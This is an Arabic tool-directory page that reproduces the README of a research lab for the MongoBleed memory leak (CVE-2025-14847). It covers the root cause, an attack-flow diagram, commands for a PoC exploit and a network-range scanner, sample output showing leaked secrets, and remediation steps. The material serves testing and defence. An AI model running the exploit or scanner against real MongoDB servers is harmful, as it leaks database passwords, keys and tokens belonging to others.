Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mongobleed-exploit-CVE-2025-14847 — مختبر الاستغلال، docker وماسح الكود لثغرة mongobleed CVE-2025-14847 بالإضافة إلى أدوات Phoenix Security Sync | Kitploit
أدوات/GitHubGitHub/security-phoenix-demo/mongobleed-exploit-cve-2025-14847
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubsecurity-phoenix-demo/mongobleed-exploit-cve-2025-14847

mongobleed-exploit-CVE-2025-14847

مختبر الاستغلال، docker وماسح الكود لثغرة mongobleed CVE-2025-14847 بالإضافة إلى أدوات Phoenix Security Sync

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
132منذ 7 أشهرلم تتم المراجعة بعد

🩸 MongoBleed - CVE-2025-14847 مختبر أبحاث الأمن السيبراني

MongoBleed Logo

CVE-2025-14847 | CVSS 8.7 (عالي) | كشف غير مصادَق للذاكرة

📖 الوثائق الكاملة • 🔬 تحليل فني • ⚡ أوامر سريعة


🎯 ملخص CVE-2025-14847

MongoBleed هي ثغرة كشف حرجة للذاكرة في طبقة نقل الشبكة لـ MongoDB تسمح للمهاجمين عن بعد غير المصادق عليهم باستخراج ذاكرة كومة حساسة دون أي بيانات اعتماد أو تفاعل المستخدم.

التأثير

الفئةالوصف
نوع الهجومكشف ذاكرة عن بعد غير مصادق عليه
السبب الجذريإرجاع حجم المخزن المؤقت المخصص بدلاً من طول البيانات الفعلي بعد فك ضغط zlib
البيانات المكشوفةكلمات مرور قاعدة البيانات، مفاتيح API، رموز الجلسات، بيانات اعتماد AWS، حالة الخادم الداخلية
الخطورةCVSS 8.7 (عالي) - يمكن الوصول عبر الشبكة، لا يتطلب مصادقة
الاستغلالاستغلال نشط يُلاحظ في البيئة الحية منذ 28 ديسمبر 2025

الإصدارات الضعيفة (بنظرة سريعة)

📖 راجع جدول الإصدارات المتأثرة الكامل ←

مقياس التعرض

  • 87,000 - 194,000 نسخة MongoDB مكشوفة علناً
  • 42% من البيئات السحابية تستضيف نسخاً ضعيفة (بحث Wiz)
  • لا يتطلب أي مصادقة - يحدث الهجوم قبل المصادقة
  • استغلال صامت - لا سجلات، لا أعطال

TL;DR لفِرق الهندسة

🔬 تشريح الثغرة

التحليل الفني

توجد الثغرة في طبقة نقل الشبكة لـ MongoDB (message_compressor_zlib.cpp) حيث عيب حرج في منطق فك ضغط zlib يسمح للمهاجمين غير المصادقين بتسريب ذاكرة خادم حساسة.

السبب الجذري

root@kitploit:~
// الكود الضعيف (قبل الإصلاح)
counterHitDecompress(input.length(), output.length());
return {output.length()};  // ❌ إرجاع حجم المخزن المؤقت المخصص

// الكود المُصحَح (بعد الإصلاح)  
counterHitDecompress(input.length(), output.length());
return length;             // ✅ إرجاع الطول الفعلي للبيانات بعد فك الضغط

تدفق الاستغلال

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│                            هجوم MongoBleed                                  │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│   المهاجم                          MongoDB الضعيف                            │
│      │                                    │                                  │
│      │  1. إرسال رسالة OP_COMPRESSED      │                                  │
│      │     uncompressedSize: 8192 (كذب)   │                                  │
│      │     البيانات الفعلية: ~100 بايت    │                                  │
│      │────────────────────────────────────>                                  │
│      │                                    │                                  │
│      │                          2. تخصيص مخزن مؤقت بحجم 8192 بايت           │
│      │                          3. فك ضغط ~100 بايت                          │
│      │                          4. العلة: إرجاع buffer.length()=8192         │
│      │                          5. محلل BSON يقرأ ذاكرة غير مهيأة            │
│      │                                    │                                  │
│      │  6. استجابة خطأ تحتوي على ذاكرة    │                                  │
│      │     مسربة كـ "أسماء حقول"           │                                  │
│      │<────────────────────────────────────                                  │
│      │                                    │                                  │
│   🔓 البيانات المسربة:                     │                                  │
│      - مفاتيح API، كلمات مرور، رموز                                           │
│      - الحالة الداخلية لـ MongoDB                                             │
│      - إعدادات تخزين WiredTiger                                               │
│      - معلومات /proc للنظام                                                   │
│      - بيانات اتصال العملاء                                                   │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

الجدول الزمني للاكتشاف

التاريخالحدث
15 ديسمبر 2025تم تحديد الثغرة؛ التذكرة الداخلية SERVER-115508
19 ديسمبر 2025

🔬 راجع التحليل الفني ← للحصول على تشريح تفصيلي للثغرة، بناء الاستغلال، وطرق الكشف.

📁 هيكل المشروع

root@kitploit:~
mongobleed-exploit-CVE-2025-14847/
├── exploit/                    # 🔴 مختبر الاستغلال
│   ├── docker-compose.yml      # نسخ MongoDB ضعيفة ومصححة
│   ├── mongobleed.py           # PoC استغلال تسرب الذاكرة
│   ├── init/init-mongo.js      # بيانات اختبار حساسة
│   ├── test-exploit.sh         # سكربت اختبار المختبر
│   └── README.md               # وثائق المختبر
│
├── scanner/                    # 🌐 ماسح الشبكة
│   ├── mongobleed_scanner.py   # ماسح ضعف IP/نطاق
│   ├── sample-targets.txt      # ملف أهداف عينة
│   └── README.md               # وثائق الماسح
│
├── code-scan/                  # 📂 ماسح الكود
│   ├── main.py                 # نقطة دخول CLI
│   ├── scanners/               # ماسحات Docker، Python، البنية التحتية
│   ├── models/                 # نماذج الاكتشاف، الضعف
│   ├── integrations/           # رفع إلى Phoenix Security
│   └── README.md               # وثائق ماسح الكود
│
└── original-exploit/           # 📚 مرجع PoC الأصلي

🚀 بداية سريعة

1. مختبر الاستغلال

root@kitploit:~
cd exploit

# بدء المختبر (نسخ ضعيفة + مصححة)
docker-compose up -d
sleep 10

# اختبار النسخة الضعيفة (يجب أن تسرب ذاكرة)
python3 mongobleed.py --host localhost --port 27017

# اختبار النسخة المصححة (يجب ألا تسرب ذاكرة)
python3 mongobleed.py --host localhost --port 27018

# اختبار المختبر الكامل
./test-exploit.sh

2. ماسح الشبكة

root@kitploit:~
cd scanner

# مسح مضيف واحد
python3 mongobleed_scanner.py 192.168.1.100

# مسح نطاق شبكة
python3 mongobleed_scanner.py 192.168.1.0/24

# مسح من ملف
python3 mongobleed_scanner.py @sample-targets.txt --json --output results.json

3. ماسح الكود

root@kitploit:~
cd code-scan

# مسح مشروع للبحث عن إصدارات MongoDB الضعيفة
python3 main.py scan /path/to/project

# مسح ورفع إلى Phoenix
python3 main.py scan /path/to/project --upload-phoenix

# تشغيل الاختبارات
python3 main.py test

⚡ أوامر سريعة

root@kitploit:~
# === مختبر الاستغلال ===
# بدء المختبر
cd exploit && docker-compose up -d && sleep 10

# تشغيل الاستغلال (النسخة الضعيفة)
python3 exploit/mongobleed.py --host localhost --port 27017

# تشغيل الاستغلال (النسخة المصححة - تحقق من عدم وجود تسريبات)
python3 exploit/mongobleed.py --host localhost --port 27018

# === ماسح الشبكة ===
# مسح المختبر المحلي
python3 scanner/mongobleed_scanner.py localhost:27017 localhost:27018

# مسح الشبكة
python3 scanner/mongobleed_scanner.py 192.168.1.0/24 --threads 20

# === ماسح الكود ===
# مسح الدليل الحالي
python3 code-scan/main.py scan .

# مسح مع إخراج JSON
python3 code-scan/main.py scan /path/to/project --json --output results.json

# مسح ورفع إلى Phoenix
python3 code-scan/main.py scan /path/to/project --upload-phoenix

📊 أمثلة الإخراج

إخراج الاستغلال

root@kitploit:~
[*] mongobleed - CVE-2025-14847 تسريب ذاكرة MongoDB
[*] الهدف: localhost:27017
[*] مسح الإزاحات 20-8192...

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: MONGOBLEED_PRIVATE_KEY_DATA_123...

[!] الهدف ضعيف أمام CVE-2025-14847
[*] إجمالي المسرب: 8748 بايت
[*] الشظايا الفريدة: 42

[!] تم اكتشاف أسرار محتملة:
    • مفتاح RSA خاص
    • سر المختبر

إخراج ماسح الشبكة

root@kitploit:~
[*] مسح 254 هدفاً مع 10 خيوط...

[1/254] 192.168.1.10:27017 - 8.2.2 [ضعيف - مؤكد]
[2/254] 192.168.1.11:27017 - 8.2.3 [آمن]

الملخص:
----------------------------------------
إجمالي الأهداف التي تم مسحها: 254
المضيفات القابلة للوصول:       12
نسخ MongoDB:                   8
الضعيفة:                       3

إخراج ماسح الكود

root@kitploit:~
================================================================================
تقرير ماسح كود MONGOBLEED - CVE-2025-14847
================================================================================

🚨 تم اكتشاف إصدارات MongoDB ضعيفة

1. [email protected]
   الملف: /project/docker-compose.yml
   النوع: docker-compose
   السبب: الإصدار 8.2.2 ضمن النطاق الضعيف [8.2.0 - 8.2.2]
   ✅ الترقية إلى: 8.2.3
   CVE: CVE-2025-14847

🛡️ ملخص المعالجة

📖 راجع دليل المعالجة الكامل ←


🔗 تكامل Phoenix Security

جميع الماسحات تدعم رفع النتائج إلى منصة Phoenix Security:

root@kitploit:~
# إنشاء التكوين
python3 code-scan/main.py create-config
cp .phoenix.config.TEMPLATE .phoenix.config

# تحرير ببيانات اعتمادك
# [phoenix]
# client_id = your_client_id
# client_secret = your_client_secret
# api_base_url = https://api.securityphoenix.cloud

# مسح ورفع
python3 code-scan/main.py scan /path/to/project --upload-phoenix

🔐 إشعار أمني

⚠️ هام: هذه المجموعة مقدمة لأغراض اختبار الأمن المصرح به والبحث فقط.

  • اختبر فقط الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
  • قد تحتوي البيانات المسربة على معلومات حساسة - تعامل بمسؤولية
  • أبلغ عن الثغرات من خلال قنوات الإفصاح المناسبة

📚 الوثائق

الوثائق الأساسية

وثائق الأدوات

🔗 مراجع خارجية

  • نشرة OX Security
  • Commit إصلاح MongoDB
  • إدخال NVD - CVE-2025-14847

👤 الإسناد

  • الاستغلال الأصلي بواسطة Joe Desimone (@dez_)
  • بيئة المختبر وتحسينات الماسح لأغراض البحث الأمني

📄 الترخيص

لاختبارات الأمن المصرح بها فقط. استخدم بمسؤولية.


آخر تحديث: ديسمبر 2025

تنزيل الأداة
الفرعضعيفتم الإصلاحالإجراء
8.2.x8.2.0 → 8.2.28.2.3الترقية فوراً
8.0.x8.0.0 → 8.0.168.0.17الترقية فوراً
7.0.x7.0.0 → 7.0.277.0.28الترقية فوراً
6.0.x6.0.0 → 6.0.266.0.27الترقية فوراً
5.0.x5.0.0 → 5.0.315.0.32الترقية فوراً
4.4.x4.4.0 → 4.4.294.4.30الترقية فوراً
≤4.2.xجميع الإصداراتلا يوجد⚠️ منتهي الدعم - الانتقال إلى إصدار مدعوم
الجانبالتفاصيل
ما هو الضعيفطبقة نقل الشبكة لخادم MongoDB التي تستخدم ضغط zlib
الخطورةعالي (CVSS 8.7/7.5)
التأثيركشف غير مصادق عن بعد لذاكرة الكومة غير المهيأة
لماذا يهمتحتوي الشظايا المسربة على كلمات مرور قاعدة البيانات، مفاتيح AWS السرية، وحالات الخادم الداخلية
حالة الاستغلالProof-of-Concept عامة "mongobleed" تم التحقق منها وتنتشر
ما يجب فعله اليومالترقية إلى الإصدارات المصححة فوراً أو تعطيل ضغط zlib
تم إصدار الإصلاح، الكشف عن CVE-2025-14847
24 ديسمبر 2025تم تصحيح أسطول MongoDB Atlas
26 ديسمبر 2025إصدار PoC العامة "mongobleed"
28 ديسمبر 2025ملاحظة استغلال في البيئة الحية
الأولويةالإجراءالتفاصيل
🔴 1ترقية MongoDBالتحديث إلى الإصدارات المصححة (8.2.3، 8.0.17، 7.0.28، 6.0.27، 5.0.32، 4.4.30)
🟠 2تعطيل zlibmongod --setParameter networkMessageCompressors=snappy,zstd
🟡 3عزل الشبكةحماية المنفذ 27017 بجدار ناري، استخدام VPN/شبكة خاصة
🔵 4تدوير بيانات الاعتمادإذا تعرضت، قم بتدوير جميع كلمات مرور قاعدة البيانات، مفاتيح API، الرموز
الوثيقةالوصف
📖 DOCUMENTATION.mdوثائق المشروع الكاملة مع الإعداد والاستخدام والمعالجة
🔬 TECHNICAL_ANALYSIS.mdتشريح الثغرة بالتفصيل، آلية الاستغلال، والكشف
⚡ QUICK_COMMANDS.mdأوامر جاهزة للنسخ واللصق لجميع الأدوات
الأداةالوثائقالوصف
🔴 مختبر الاستغلالexploit/README.mdمختبر MongoDB ضعيف/مصحح قائم على Docker
🌐 ماسح الشبكةscanner/README.mdماسح ضعف IP/CIDR
📂 ماسح الكودcode-scan/README.mdماسح قاعدة الكود للبحث عن الإصدارات الضعيفة